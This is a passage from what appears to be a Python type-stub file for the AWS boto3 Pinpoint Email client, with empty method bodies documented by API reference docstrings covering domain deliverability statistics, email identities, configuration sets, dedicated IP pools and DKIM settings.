test.\n - **SpfPercentage** *(float) --* \n The percentage of emails that were authenticated by using Sender Policy Framework (SPF) during the predictive inbox placement test.\n - **DkimPercentage** *(float) --* \n The percentage of emails that were authenticated by using DomainKeys Identified Mail (DKIM) during the predictive inbox placement test.\n - **Message** *(string) --* \n An object that contains the message that you sent when you performed this predictive inbox placement test.\n :type ReportId: string\n :param ReportId: **[REQUIRED]**\n A unique string that identifies the predictive inbox placement test.\n :rtype: dict\n :returns:\n \"\"\"\n pass\n\n def get_domain_statistics_report(self, Domain: str, StartDate: datetime, EndDate: datetime) -> Dict:\n \"\"\"\n Retrieve inbox placement and engagement rates for the domains that you use to send email.\n See also: `AWS API Documentation `_\n \n **Request Syntax**\n ::\n response = client.get_domain_statistics_report(\n Domain='string',\n StartDate=datetime(2015, 1, 1),\n EndDate=datetime(2015, 1, 1)\n )\n \n **Response Syntax**\n ::\n {\n 'OverallVolume': {\n 'VolumeStatistics': {\n 'InboxRawCount': 123,\n 'SpamRawCount': 123,\n 'ProjectedInbox': 123,\n 'ProjectedSpam': 123\n },\n 'ReadRatePercent': 123.0,\n 'DomainIspPlacements': [\n {\n 'IspName': 
'string',\n 'InboxRawCount': 123,\n 'SpamRawCount': 123,\n 'InboxPercentage': 123.0,\n 'SpamPercentage': 123.0\n },\n ]\n },\n 'DailyVolumes': [\n {\n 'StartDate': datetime(2015, 1, 1),\n 'VolumeStatistics': {\n 'InboxRawCount': 123,\n 'SpamRawCount': 123,\n 'ProjectedInbox': 123,\n 'ProjectedSpam': 123\n },\n 'DomainIspPlacements': [\n {\n 'IspName': 'string',\n 'InboxRawCount': 123,\n 'SpamRawCount': 123,\n 'InboxPercentage': 123.0,\n 'SpamPercentage': 123.0\n },\n ]\n },\n ]\n }\n \n **Response Structure**\n - *(dict) --* \n An object that includes statistics that are related to the domain that you specified.\n - **OverallVolume** *(dict) --* \n An object that contains deliverability metrics for the domain that you specified. The data in this object is a summary of all of the data that was collected from the ``StartDate`` to the ``EndDate`` .\n - **VolumeStatistics** *(dict) --* \n An object that contains information about the numbers of messages that arrived in recipients' inboxes and junk mail folders.\n - **InboxRawCount** *(integer) --* \n The total number of emails that arrived in recipients' inboxes.\n - **SpamRawCount** *(integer) --* \n The total number of emails that arrived in recipients' spam or junk mail folders.\n - **ProjectedInbox** *(integer) --* \n An estimate of the percentage of emails sent from the current domain that will arrive in recipients' inboxes.\n - **ProjectedSpam** *(integer) --* \n An estimate of the percentage of emails sent from the current domain that will arrive in recipients' spam or junk mail folders.\n - **ReadRatePercent** *(float) --* \n The percentage of emails that were sent from the domain that were read by their recipients.\n - **DomainIspPlacements** *(list) --* \n An object that contains inbox and junk mail placement metrics for individual email providers.\n - *(dict) --* \n An object that contains inbox placement data for email sent from one of your email domains to a specific email provider.\n - **IspName** *(string) --* \n The name of the email provider that the inbox placement data applies to.\n - **InboxRawCount** *(integer) --* \n The total number of messages that were sent from the selected domain to the specified email provider that arrived in recipients' inboxes.\n - **SpamRawCount** *(integer) --* \n The total number of messages that were sent from the selected domain to the specified email provider that arrived in recipients' spam or junk mail folders.\n - **InboxPercentage** *(float) --* \n The percentage of messages that were sent from the selected domain to the specified email provider that arrived in recipients' inboxes.\n - **SpamPercentage** *(float) --* \n The percentage of messages that were sent from the selected domain to the specified email provider that arrived in recipients' spam or junk mail folders.\n - **DailyVolumes** *(list) --* \n An object that contains deliverability metrics for the domain that you specified. 
This object contains data for each day, starting on the ``StartDate`` and ending on the ``EndDate`` .\n - *(dict) --* \n An object that contains information about the volume of email sent on each day of the analysis period.\n - **StartDate** *(datetime) --* \n The date that the DailyVolume metrics apply to, in Unix time.\n - **VolumeStatistics** *(dict) --* \n An object that contains inbox placement metrics for a specific day in the analysis period.\n - **InboxRawCount** *(integer) --* \n The total number of emails that arrived in recipients' inboxes.\n - **SpamRawCount** *(integer) --* \n The total number of emails that arrived in recipients' spam or junk mail folders.\n - **ProjectedInbox** *(integer) --* \n An estimate of the percentage of emails sent from the current domain that will arrive in recipients' inboxes.\n - **ProjectedSpam** *(integer) --* \n An estimate of the percentage of emails sent from the current domain that will arrive in recipients' spam or junk mail folders.\n - **DomainIspPlacements** *(list) --* \n An object that contains inbox placement metrics for a specific day in the analysis period, broken out by the recipient's email provider.\n - *(dict) --* \n An object that contains inbox placement data for email sent from one of your email domains to a specific email provider.\n - **IspName** *(string) --* \n The name of the email provider that the inbox placement data applies to.\n - **InboxRawCount** *(integer) --* \n The total number of messages that were sent from the selected domain to the specified email provider that arrived in recipients' inboxes.\n - **SpamRawCount** *(integer) --* \n The total number of messages that were sent from the selected domain to the specified email provider that arrived in recipients' spam or junk mail folders.\n - **InboxPercentage** *(float) --* \n The percentage of messages that were sent from the selected domain to the specified email provider that arrived in recipients' inboxes.\n - **SpamPercentage** *(float) --* \n The percentage of messages that were sent from the selected domain to the specified email provider that arrived in recipients' spam or junk mail folders.\n :type Domain: string\n :param Domain: **[REQUIRED]**\n The domain that you want to obtain deliverability metrics for.\n :type StartDate: datetime\n :param StartDate: **[REQUIRED]**\n The first day (in Unix time) that you want to obtain domain deliverability metrics for.\n :type EndDate: datetime\n :param EndDate: **[REQUIRED]**\n The last day (in Unix time) that you want to obtain domain deliverability metrics for. 
The ``EndDate`` that you specify has to be less than or equal to 30 days after the ``StartDate`` .\n :rtype: dict\n :returns:\n \"\"\"\n pass\n\n def get_email_identity(self, EmailIdentity: str) -> Dict:\n \"\"\"\n Provides information about a specific identity associated with your Amazon Pinpoint account, including the identity's verification status, its DKIM authentication status, and its custom Mail-From settings.\n See also: `AWS API Documentation `_\n \n **Request Syntax**\n ::\n response = client.get_email_identity(\n EmailIdentity='string'\n )\n \n **Response Syntax**\n ::\n {\n 'IdentityType': 'EMAIL_ADDRESS'|'DOMAIN'|'MANAGED_DOMAIN',\n 'FeedbackForwardingStatus': True|False,\n 'VerifiedForSendingStatus': True|False,\n 'DkimAttributes': {\n 'SigningEnabled': True|False,\n 'Status': 'PENDING'|'SUCCESS'|'FAILED'|'TEMPORARY_FAILURE'|'NOT_STARTED',\n 'Tokens': [\n 'string',\n ]\n },\n 'MailFromAttributes': {\n 'MailFromDomain': 'string',\n 'MailFromDomainStatus': 'PENDING'|'SUCCESS'|'FAILED'|'TEMPORARY_FAILURE',\n 'BehaviorOnMxFailure': 'USE_DEFAULT_VALUE'|'REJECT_MESSAGE'\n }\n }\n \n **Response Structure**\n - *(dict) --* \n Details about an email identity.\n - **IdentityType** *(string) --* \n The email identity type.\n - **FeedbackForwardingStatus** *(boolean) --* \n The feedback forwarding configuration for the identity.\n If the value is ``true`` , Amazon Pinpoint sends you email notifications when bounce or complaint events occur. Amazon Pinpoint sends this notification to the address that you specified in the Return-Path header of the original email.\n When you set this value to ``false`` , Amazon Pinpoint sends notifications through other mechanisms, such as by notifying an Amazon SNS topic or another event destination. You're required to have a method of tracking bounces and complaints. If you haven't set up another mechanism for receiving bounce or complaint notifications, Amazon Pinpoint sends an email notification when these events occur (even if this setting is disabled).\n - **VerifiedForSendingStatus** *(boolean) --* \n Specifies whether or not the identity is verified. In Amazon Pinpoint, you can only send email from verified email addresses or domains. For more information about verifying identities, see the `Amazon Pinpoint User Guide `__ .\n - **DkimAttributes** *(dict) --* \n An object that contains information about the DKIM attributes for the identity. This object includes the tokens that you use to create the CNAME records that are required to complete the DKIM verification process.\n - **SigningEnabled** *(boolean) --* \n If the value is ``true`` , then the messages that Amazon Pinpoint sends from the identity are DKIM-signed. If the value is ``false`` , then the messages that Amazon Pinpoint sends from the identity aren't DKIM-signed.\n - **Status** *(string) --* \n Describes whether or not Amazon Pinpoint has successfully located the DKIM records in the DNS records for the domain. The status can be one of the following:\n * ``PENDING`` – Amazon Pinpoint hasn't yet located the DKIM records in the DNS configuration for the domain, but will continue to attempt to locate them. \n * ``SUCCESS`` – Amazon Pinpoint located the DKIM records in the DNS configuration for the domain and determined that they're correct. Amazon Pinpoint can now send DKIM-signed email from the identity. \n * ``FAILED`` – Amazon Pinpoint was unable to locate the DKIM records in the DNS settings for the domain, and won't continue to search for them. 
\n * ``TEMPORARY_FAILURE`` – A temporary issue occurred, which prevented Amazon Pinpoint from determining the DKIM status for the domain. \n * ``NOT_STARTED`` – Amazon Pinpoint hasn't yet started searching for the DKIM records in the DNS configuration for the domain. \n - **Tokens** *(list) --* \n A set of unique strings that you use to create a set of CNAME records that you add to the DNS configuration for your domain. When Amazon Pinpoint detects these records in the DNS configuration for your domain, the DKIM authentication process is complete. Amazon Pinpoint usually detects these records within about 72 hours of adding them to the DNS configuration for your domain.\n - *(string) --* \n - **MailFromAttributes** *(dict) --* \n An object that contains information about the Mail-From attributes for the email identity.\n - **MailFromDomain** *(string) --* \n The name of a domain that an email identity uses as a custom MAIL FROM domain.\n - **MailFromDomainStatus** *(string) --* \n The status of the MAIL FROM domain. This status can have the following values:\n * ``PENDING`` – Amazon Pinpoint hasn't started searching for the MX record yet. \n * ``SUCCESS`` – Amazon Pinpoint detected the required MX record for the MAIL FROM domain. \n * ``FAILED`` – Amazon Pinpoint can't find the required MX record, or the record no longer exists. \n * ``TEMPORARY_FAILURE`` – A temporary issue occurred, which prevented Amazon Pinpoint from determining the status of the MAIL FROM domain. \n - **BehaviorOnMxFailure** *(string) --* \n The action that Amazon Pinpoint takes if it can't read the required MX record for a custom MAIL FROM domain. When you set this value to ``UseDefaultValue`` , Amazon Pinpoint uses *amazonses.com* as the MAIL FROM domain. When you set this value to ``RejectMessage`` , Amazon Pinpoint returns a ``MailFromDomainNotVerified`` error, and doesn't attempt to deliver the email.\n These behaviors are taken when the custom MAIL FROM domain configuration is in the ``Pending`` , ``Failed`` , and ``TemporaryFailure`` states.\n :type EmailIdentity: string\n :param EmailIdentity: **[REQUIRED]**\n The email identity that you want to retrieve details for.\n :rtype: dict\n :returns:\n \"\"\"\n pass\n\n def get_paginator(self, operation_name: str = None) -> Paginator:\n \"\"\"\n Create a paginator for an operation.\n :type operation_name: string\n :param operation_name: The operation name. This is the same name\n as the method name on the client. For example, if the\n method name is ``create_foo``, and you\'d normally invoke the\n operation as ``client.create_foo(**kwargs)``, if the\n ``create_foo`` operation can be paginated, you can use the\n call ``client.get_paginator(\\\"create_foo\\\")``.\n :raise OperationNotPageableError: Raised if the operation is not\n pageable. You can use the ``client.can_paginate`` method to\n check if an operation is pageable.\n :rtype: L{botocore.paginate.Paginator}\n :return: A paginator object.\n \"\"\"\n pass\n\n def get_waiter(self, waiter_name: str = None) -> Waiter:\n \"\"\"\n Returns an object that can wait for some condition.\n :type waiter_name: str\n :param waiter_name: The name of the waiter to get. 
See the waiters\n section of the service docs for a list of available waiters.\n :returns: The specified waiter object.\n :rtype: botocore.waiter.Waiter\n \"\"\"\n pass\n\n def list_configuration_sets(self, NextToken: str = None, PageSize: int = None) -> Dict:\n \"\"\"\n List all of the configuration sets associated with your Amazon Pinpoint account in the current region.\n In Amazon Pinpoint, *configuration sets* are groups of rules that you can apply to the emails you send. You apply a configuration set to an email by including a reference to the configuration set in the headers of the email. When you apply a configuration set to an email, all of the rules in that configuration set are applied to the email.\n See also: `AWS API Documentation `_\n \n **Request Syntax**\n ::\n response = client.list_configuration_sets(\n NextToken='string',\n PageSize=123\n )\n \n **Response Syntax**\n ::\n {\n 'ConfigurationSets': [\n 'string',\n ],\n 'NextToken': 'string'\n }\n \n **Response Structure**\n - *(dict) --* \n A list of configuration sets in your Amazon Pinpoint account in the current AWS Region.\n - **ConfigurationSets** *(list) --* \n An array that contains all of the configuration sets in your Amazon Pinpoint account in the current AWS Region.\n - *(string) --* \n The name of a configuration set.\n In Amazon Pinpoint, *configuration sets* are groups of rules that you can apply to the emails you send. You apply a configuration set to an email by including a reference to the configuration set in the headers of the email. When you apply a configuration set to an email, all of the rules in that configuration set are applied to the email.\n - **NextToken** *(string) --* \n A token that indicates that there are additional configuration sets to list. To view additional configuration sets, issue another request to ``ListConfigurationSets`` , and pass this token in the ``NextToken`` parameter.\n :type NextToken: string\n :param NextToken:\n A token returned from a previous call to ``ListConfigurationSets`` to indicate the position in the list of configuration sets.\n :type PageSize: integer\n :param PageSize:\n The number of results to show in a single call to ``ListConfigurationSets`` . If the number of results is larger than the number you specified in this parameter, then the response includes a ``NextToken`` element, which you can use to obtain additional results.\n :rtype: dict\n :returns:\n \"\"\"\n pass\n\n def list_dedicated_ip_pools(self, NextToken: str = None, PageSize: int = None) -> Dict:\n \"\"\"\n List all of the dedicated IP pools that exist in your Amazon Pinpoint account in the current AWS Region.\n See also: `AWS API Documentation `_\n \n **Request Syntax**\n ::\n response = client.list_dedicated_ip_pools(\n NextToken='string',\n PageSize=123\n )\n \n **Response Syntax**\n ::\n {\n 'DedicatedIpPools': [\n 'string',\n ],\n 'NextToken': 'string'\n }\n \n **Response Structure**\n - *(dict) --* \n A list of dedicated IP pools.\n - **DedicatedIpPools** *(list) --* \n A list of all of the dedicated IP pools that are associated with your Amazon Pinpoint account.\n - *(string) --* \n The name of a dedicated IP pool.\n - **NextToken** *(string) --* \n A token that indicates that there are additional IP pools to list. 
To view additional IP pools, issue another request to ``ListDedicatedIpPools`` , passing this token in the ``NextToken`` parameter.\n :type NextToken: string\n :param NextToken:\n A token returned from a previous call to ``ListDedicatedIpPools`` to indicate the position in the list of dedicated IP pools.\n :type PageSize: integer\n :param PageSize:\n The number of results to show in a single call to ``ListDedicatedIpPools`` . If the number of results is larger than the number you specified in this parameter, then the response includes a ``NextToken`` element, which you can use to obtain additional results.\n :rtype: dict\n :returns:\n \"\"\"\n pass\n\n def list_deliverability_test_reports(self, NextToken: str = None, PageSize: int = None) -> Dict:\n \"\"\"\n Show a list of the predictive inbox placement tests that you've performed, regardless of their statuses. For predictive inbox placement tests that are complete, you can use the ``GetDeliverabilityTestReport`` operation to view the results.\n See also: `AWS API Documentation `_\n \n **Request Syntax**\n ::\n response = client.list_deliverability_test_reports(\n NextToken='string',\n PageSize=123\n )\n \n **Response Syntax**\n ::\n {\n 'DeliverabilityTestReports': [\n {\n 'ReportId': 'string',\n 'ReportName': 'string',\n 'Subject': 'string',\n 'FromEmailAddress': 'string',\n 'CreateDate': datetime(2015, 1, 1),\n 'DeliverabilityTestStatus': 'IN_PROGRESS'|'COMPLETED'\n },\n ],\n 'NextToken': 'string'\n }\n \n **Response Structure**\n - *(dict) --* \n A list of the predictive inbox placement test reports that are available for your account, regardless of whether or not those tests are complete.\n - **DeliverabilityTestReports** *(list) --* \n An object that contains a lists of predictive inbox placement tests that you've performed.\n - *(dict) --* \n An object that contains metadata related to a predictive inbox placement test.\n - **ReportId** *(string) --* \n A unique string that identifies the predictive inbox placement test.\n - **ReportName** *(string) --* \n A name that helps you identify a predictive inbox placement test report.\n - **Subject** *(string) --* \n The subject line for an email that you submitted in a predictive inbox placement test.\n - **FromEmailAddress** *(string) --* \n The sender address that you specified for the predictive inbox placement test.\n - **CreateDate** *(datetime) --* \n The date and time when the predictive inbox placement test was created, in Unix time format.\n - **DeliverabilityTestStatus** *(string) --* \n The status of the predictive inbox placement test. If the status is ``IN_PROGRESS`` , then the predictive inbox placement test is currently running. Predictive inbox placement tests are usually complete within 24 hours of creating the test. If the status is ``COMPLETE`` , then the test is finished, and you can use the ``GetDeliverabilityTestReport`` to view the results of the test.\n - **NextToken** *(string) --* \n A token that indicates that there are additional predictive inbox placement tests to list. To view additional predictive inbox placement tests, issue another request to ``ListDeliverabilityTestReports`` , and pass this token in the ``NextToken`` parameter.\n :type NextToken: string\n :param NextToken:\n A token returned from a previous call to ``ListDeliverabilityTestReports`` to indicate the position in the list of predictive inbox placement tests.\n :type PageSize: integer\n :param PageSize:\n The number of results to show in a single call to ``ListDeliverabilityTestReports`` . 
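(Illustrative aside, not part of the generated reference: a minimal sketch of collecting every report by following ``NextToken``, assuming ``client`` is the Pinpoint Email client.)\n ::\n reports = []\n kwargs = {'PageSize': 100}\n while True:\n     page = client.list_deliverability_test_reports(**kwargs)\n     reports.extend(page['DeliverabilityTestReports'])\n     if not page.get('NextToken'):\n         break\n     kwargs['NextToken'] = page['NextToken']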
If the number of results is larger than the number you specified in this parameter, then the response includes a ``NextToken`` element, which you can use to obtain additional results.\n The value you specify has to be at least 0, and can be no more than 1000.\n :rtype: dict\n :returns:\n \"\"\"\n pass\n\n def list_email_identities(self, NextToken: str = None, PageSize: int = None) -> Dict:\n \"\"\"\n Returns a list of all of the email identities that are associated with your Amazon Pinpoint account. An identity can be either an email address or a domain. This operation returns identities that are verified as well as those that aren't.\n See also: `AWS API Documentation `_\n \n **Request Syntax**\n ::\n response = client.list_email_identities(\n NextToken='string',\n PageSize=123\n )\n \n **Response Syntax**\n ::\n {\n 'EmailIdentities': [\n {\n 'IdentityType': 'EMAIL_ADDRESS'|'DOMAIN'|'MANAGED_DOMAIN',\n 'IdentityName': 'string',\n 'SendingEnabled': True|False\n },\n ],\n 'NextToken': 'string'\n }\n \n **Response Structure**\n - *(dict) --* \n A list of all of the identities that you've attempted to verify for use with Amazon Pinpoint, regardless of whether or not those identities were successfully verified.\n - **EmailIdentities** *(list) --* \n An array that includes all of the identities associated with your Amazon Pinpoint account.\n - *(dict) --* \n Information about an email identity.\n - **IdentityType** *(string) --* \n The email identity type. The identity type can be one of the following:\n * ``EMAIL_ADDRESS`` – The identity is an email address. \n * ``DOMAIN`` – The identity is a domain. \n * ``MANAGED_DOMAIN`` – The identity is a domain that is managed by AWS. \n - **IdentityName** *(string) --* \n The address or domain of the identity.\n - **SendingEnabled** *(boolean) --* \n Indicates whether or not you can send email from the identity.\n In Amazon Pinpoint, an identity is an email address or domain that you send email from. Before you can send email from an identity, you have to demonstrate that you own the identity, and that you authorize Amazon Pinpoint to send email from that identity.\n - **NextToken** *(string) --* \n A token that indicates that there are additional email identities to list. To view additional email identities, issue another request to ``ListEmailIdentities`` , and pass this token in the ``NextToken`` parameter.\n :type NextToken: string\n :param NextToken:\n A token returned from a previous call to ``ListEmailIdentities`` to indicate the position in the list of identities.\n :type PageSize: integer\n :param PageSize:\n The number of results to show in a single call to ``ListEmailIdentities`` . If the number of results is larger than the number you specified in this parameter, then the response includes a ``NextToken`` element, which you can use to obtain additional results.\n The value you specify has to be at least 0, and can be no more than 1000.\n :rtype: dict\n :returns:\n \"\"\"\n pass\n\n def list_tags_for_resource(self, ResourceArn: str) -> Dict:\n \"\"\"\n Retrieve a list of the tags (keys and values) that are associated with a specific resource. A *tag* is a label that you optionally define and associate with a resource in Amazon Pinpoint. Each tag consists of a required *tag key* and an optional associated *tag value* . A tag key is a general label that acts as a category for more specific tag values.
A tag value acts as a descriptor within a tag key.\n See also: `AWS API Documentation `_\n \n **Request Syntax**\n ::\n response = client.list_tags_for_resource(\n ResourceArn='string'\n )\n \n **Response Syntax**\n ::\n {\n 'Tags': [\n {\n 'Key': 'string',\n 'Value': 'string'\n },\n ]\n }\n \n **Response Structure**\n - *(dict) --* \n - **Tags** *(list) --* \n An array that lists all the tags that are associated with the resource. Each tag consists of a required tag key (``Key`` ) and an associated tag value (``Value`` )\n - *(dict) --* \n An object that defines the tags that are associated with a resource. A *tag* is a label that you optionally define and associate with a resource in Amazon Pinpoint. Tags can help you categorize and manage resources in different ways, such as by purpose, owner, environment, or other criteria. A resource can have as many as 50 tags.\n Each tag consists of a required *tag key* and an associated *tag value* , both of which you define. A tag key is a general label that acts as a category for a more specific tag value. A tag value acts as a descriptor within a tag key. For example, if you have two versions of an Amazon Pinpoint project, one for internal testing and another for external use, you might assign a ``Stack`` tag key to both projects. The value of the ``Stack`` tag key might be ``Test`` for one project and ``Production`` for the other project.\n A tag key can contain as many as 128 characters. A tag value can contain as many as 256 characters. The characters can be Unicode letters, digits, white space, or one of the following symbols: _ . : / = + -. The following additional restrictions apply to tags:\n * Tag keys and values are case sensitive. \n * For each associated resource, each tag key must be unique and it can have only one value. \n * The ``aws:`` prefix is reserved for use by AWS; you can’t use it in any tag keys or values that you define. In addition, you can't edit or remove tag keys or values that use this prefix. Tags that use this prefix don’t count against the limit of 50 tags per resource. \n * You can associate tags with public or shared resources, but the tags are available only for your AWS account, not any other accounts that share the resource. In addition, the tags are available only for resources that are located in the specified AWS Region for your AWS account. \n - **Key** *(string) --* \n One part of a key-value pair that defines a tag. The maximum length of a tag key is 128 characters. The minimum length is 1 character.\n - **Value** *(string) --* \n The optional part of a key-value pair that defines a tag. The maximum length of a tag value is 256 characters. The minimum length is 0 characters. If you don’t want a resource to have a specific tag value, don’t specify a value for this parameter. 
Amazon Pinpoint will set the value to an empty string.\n :type ResourceArn: string\n :param ResourceArn: **[REQUIRED]**\n The Amazon Resource Name (ARN) of the resource that you want to retrieve tag information for.\n :rtype: dict\n :returns:\n \"\"\"\n pass\n\n def put_account_dedicated_ip_warmup_attributes(self, AutoWarmupEnabled: bool = None) -> Dict:\n \"\"\"\n Enable or disable the automatic warm-up feature for dedicated IP addresses.\n See also: `AWS API Documentation `_\n \n **Request Syntax**\n ::\n response = client.put_account_dedicated_ip_warmup_attributes(\n AutoWarmupEnabled=True|False\n )\n \n **Response Syntax**\n ::\n {}\n \n **Response Structure**\n - *(dict) --* \n An HTTP 200 response if the request succeeds, or an error message if the request fails.\n :type AutoWarmupEnabled: boolean\n :param AutoWarmupEnabled:\n Enables or disables the automatic warm-up feature for dedicated IP addresses that are associated with your Amazon Pinpoint account in the current AWS Region. Set to ``true`` to enable the automatic warm-up feature, or set to ``false`` to disable it.\n :rtype: dict\n :returns:\n \"\"\"\n pass\n\n def put_account_sending_attributes(self, SendingEnabled: bool = None) -> Dict:\n \"\"\"\n Enable or disable the ability of your account to send email.\n See also: `AWS API Documentation `_\n \n **Request Syntax**\n ::\n response = client.put_account_sending_attributes(\n SendingEnabled=True|False\n )\n \n **Response Syntax**\n ::\n {}\n \n **Response Structure**\n - *(dict) --* \n An HTTP 200 response if the request succeeds, or an error message if the request fails.\n :type SendingEnabled: boolean\n :param SendingEnabled:\n Enables or disables your account\\'s ability to send email. Set to ``true`` to enable email sending, or set to ``false`` to disable email sending.\n .. note::\n If AWS paused your account\\'s ability to send email, you can\\'t use this operation to resume your account\\'s ability to send email.\n :rtype: dict\n :returns:\n \"\"\"\n pass\n\n def put_configuration_set_delivery_options(self, ConfigurationSetName: str, SendingPoolName: str = None) -> Dict:\n \"\"\"\n Associate a configuration set with a dedicated IP pool. 
You can use dedicated IP pools to create groups of dedicated IP addresses for sending specific types of email.\n See also: `AWS API Documentation `_\n \n **Request Syntax**\n ::\n response = client.put_configuration_set_delivery_options(\n ConfigurationSetName='string',\n SendingPoolName='string'\n )\n \n **Response Syntax**\n ::\n {}\n \n **Response Structure**\n - *(dict) --* \n An HTTP 200 response if the request succeeds, or an error message if the request fails.\n :type ConfigurationSetName: string\n :param ConfigurationSetName: **[REQUIRED]**\n The name of the configuration set that you want to associate with a dedicated IP pool.\n :type SendingPoolName: string\n :param SendingPoolName:\n The name of the dedicated IP pool that you want to associate with the configuration set.\n :rtype: dict\n :returns:\n \"\"\"\n pass\n\n def put_configuration_set_reputation_options(self, ConfigurationSetName: str, ReputationMetricsEnabled: bool = None) -> Dict:\n \"\"\"\n Enable or disable collection of reputation metrics for emails that you send using a particular configuration set in a specific AWS Region.\n See also: `AWS API Documentation `_\n \n **Request Syntax**\n ::\n response = client.put_configuration_set_reputation_options(\n ConfigurationSetName='string',\n ReputationMetricsEnabled=True|False\n )\n \n **Response Syntax**\n ::\n {}\n \n **Response Structure**\n - *(dict) --* \n An HTTP 200 response if the request succeeds, or an error message if the request fails.\n :type ConfigurationSetName: string\n :param ConfigurationSetName: **[REQUIRED]**\n The name of the configuration set that you want to enable or disable reputation metric tracking for.\n :type ReputationMetricsEnabled: boolean\n :param ReputationMetricsEnabled:\n If ``true`` , tracking of reputation metrics is enabled for the configuration set. If ``false`` , tracking of reputation metrics is disabled for the configuration set.\n :rtype: dict\n :returns:\n \"\"\"\n pass\n\n def put_configuration_set_sending_options(self, ConfigurationSetName: str, SendingEnabled: bool = None) -> Dict:\n \"\"\"\n Enable or disable email sending for messages that use a particular configuration set in a specific AWS Region.\n See also: `AWS API Documentation `_\n \n **Request Syntax**\n ::\n response = client.put_configuration_set_sending_options(\n ConfigurationSetName='string',\n SendingEnabled=True|False\n )\n \n **Response Syntax**\n ::\n {}\n \n **Response Structure**\n - *(dict) --* \n An HTTP 200 response if the request succeeds, or an error message if the request fails.\n :type ConfigurationSetName: string\n :param ConfigurationSetName: **[REQUIRED]**\n The name of the configuration set that you want to enable or disable email sending for.\n :type SendingEnabled: boolean\n :param SendingEnabled:\n If ``true`` , email sending is enabled for the configuration set. 
If ``false`` , email sending is disabled for the configuration set.\n :rtype: dict\n :returns:\n \"\"\"\n pass\n\n def put_configuration_set_tracking_options(self, ConfigurationSetName: str, CustomRedirectDomain: str = None) -> Dict:\n \"\"\"\n Specify a custom domain to use for open and click tracking elements in email that you send using Amazon Pinpoint.\n See also: `AWS API Documentation `_\n \n **Request Syntax**\n ::\n response = client.put_configuration_set_tracking_options(\n ConfigurationSetName='string',\n CustomRedirectDomain='string'\n )\n \n **Response Syntax**\n ::\n {}\n \n **Response Structure**\n - *(dict) --* \n An HTTP 200 response if the request succeeds, or an error message if the request fails.\n :type ConfigurationSetName: string\n :param ConfigurationSetName: **[REQUIRED]**\n The name of the configuration set that you want to add a custom tracking domain to.\n :type CustomRedirectDomain: string\n :param CustomRedirectDomain:\n The domain that you want to use to track open and click events.\n :rtype: dict\n :returns:\n \"\"\"\n pass\n\n def put_dedicated_ip_in_pool(self, Ip: str, DestinationPoolName: str) -> Dict:\n \"\"\"\n Move a dedicated IP address to an existing dedicated IP pool.\n .. note::\n The dedicated IP address that you specify must already exist, and must be associated with your Amazon Pinpoint account. \n The dedicated IP pool you specify must already exist. You can create a new pool by using the ``CreateDedicatedIpPool`` operation.\n See also: `AWS API Documentation `_\n \n **Request Syntax**\n ::\n response = client.put_dedicated_ip_in_pool(\n Ip='string',\n DestinationPoolName='string'\n )\n \n **Response Syntax**\n ::\n {}\n \n **Response Structure**\n - *(dict) --* \n An HTTP 200 response if the request succeeds, or an error message if the request fails.\n :type Ip: string\n :param Ip: **[REQUIRED]**\n The IP address that you want to move to the dedicated IP pool. The value you specify has to be a dedicated IP address that\\'s associated with your Amazon Pinpoint account.\n :type DestinationPoolName: string\n :param DestinationPoolName: **[REQUIRED]**\n The name of the IP pool that you want to add the dedicated IP address to. You have to specify an IP pool that already exists.\n :rtype: dict\n :returns:\n \"\"\"\n pass\n\n def put_dedicated_ip_warmup_attributes(self, Ip: str, WarmupPercentage: int) -> Dict:\n \"\"\"\n See also: `AWS API Documentation `_\n \n **Request Syntax**\n ::\n response = client.put_dedicated_ip_warmup_attributes(\n Ip='string',\n WarmupPercentage=123\n )\n \n **Response Syntax**\n ::\n {}\n \n **Response Structure**\n - *(dict) --* \n An HTTP 200 response if the request succeeds, or an error message if the request fails.\n :type Ip: string\n :param Ip: **[REQUIRED]**\n The dedicated IP address that you want to update the warm-up attributes for.\n :type WarmupPercentage: integer\n :param WarmupPercentage: **[REQUIRED]**\n The warm-up percentage that you want to associate with the dedicated IP address.\n :rtype: dict\n :returns:\n \"\"\"\n pass\n\n def put_deliverability_dashboard_option(self, DashboardEnabled: bool) -> Dict:\n \"\"\"\n Enable or disable the Deliverability dashboard. When you enable the Deliverability dashboard, you gain access to reputation metrics for the domains that you use to send email using Amazon Pinpoint. 
You also gain the ability to perform predictive inbox placement tests.\n When you use the Deliverability dashboard, you pay a monthly charge of USD$1,250.00, in addition to any other fees that you accrue by using Amazon Pinpoint. If you enable the Deliverability dashboard after the first day of a calendar month, we prorate the monthly charge based on how many days have elapsed in the current calendar month.\n See also: `AWS API Documentation `_\n \n **Request Syntax**\n ::\n response = client.put_deliverability_dashboard_option(\n DashboardEnabled=True|False\n )\n \n **Response Syntax**\n ::\n {}\n \n **Response Structure**\n - *(dict) --* \n A response that indicates whether the Deliverability dashboard is enabled for your Amazon Pinpoint account.\n :type DashboardEnabled: boolean\n :param DashboardEnabled: **[REQUIRED]**\n Indicates whether the Deliverability dashboard is enabled. If the value is ``true`` , then the dashboard is enabled.\n :rtype: dict\n :returns:\n \"\"\"\n pass\n\n def put_email_identity_dkim_attributes(self, EmailIdentity: str, SigningEnabled: bool = None) -> Dict:\n \"\"\"\n Used to enable or disable DKIM authentication for an email identity.\n See also: `AWS API Documentation `_\n \n **Request Syntax**\n ::\n response = client.put_email_identity_dkim_attributes(\n EmailIdentity='string',\n SigningEnabled=True|False\n )\n \n **Response Syntax**\n ::\n {}\n \n **Response Structure**\n - *(dict) --* \n An HTTP 200 response if the request succeeds, or an error message if the request fails.\n :type EmailIdentity: string\n :param EmailIdentity: **[REQUIRED]**\n The email identity that you want to change the DKIM settings for.\n :type SigningEnabled: boolean\n :param SigningEnabled:\n Sets the DKIM signing configuration for the identity.\n When you set this value ``true`` , then the messages that Amazon Pinpoint sends from the identity are DKIM-signed. When you set this value to ``false`` , then the messages that Amazon Pinpoint sends from the identity aren\\'t DKIM-signed.\n :rtype: dict\n :returns:\n \"\"\"\n pass\n\n def put_email_identity_feedback_attributes(self, EmailIdentity: str, EmailForwardingEnabled: bool = None) -> Dict:\n \"\"\"\n Used to enable or disable feedback forwarding for an identity. This setting determines what happens when an identity is used to send an email that results in a bounce or complaint event.\n When you enable feedback forwarding, Amazon Pinpoint sends you email notifications when bounce or complaint events occur. Amazon Pinpoint sends this notification to the address that you specified in the Return-Path header of the original email.\n When you disable feedback forwarding, Amazon Pinpoint sends notifications through other mechanisms, such as by notifying an Amazon SNS topic. You're required to have a method of tracking bounces and complaints. 
